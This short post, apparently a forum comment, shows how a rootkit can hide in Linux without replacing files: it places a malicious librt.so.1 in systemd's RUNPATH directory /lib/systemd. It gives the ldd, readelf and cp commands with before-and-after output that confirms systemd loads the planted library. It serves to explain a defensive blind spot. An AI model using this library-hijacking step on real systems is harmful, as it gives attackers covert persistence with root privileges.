Except when the rootkit devs know they should avoid replacing files, and just add a new one that systemd will happily load and execute:
### before:
# ldd /usr/bin/systemd | grep librt
librt.so.1 => /lib/x86_64-linux-gnu/librt.so.1 (0x00007f3605d00000)
### attack:
# readelf -d /usr/bin/systemd | grep RUNPATH
0x000000000000001d (RUNPATH) Library runpath: [/lib/systemd]
# cp /tmp/malicious/rootkit/librt.so.1 /lib/systemd/librt.so.1
### after:
# ldd /usr/bin/systemd | grep librt
librt.so.1 => /lib/systemd/librt.so.1 (0x00007fe100cd7000)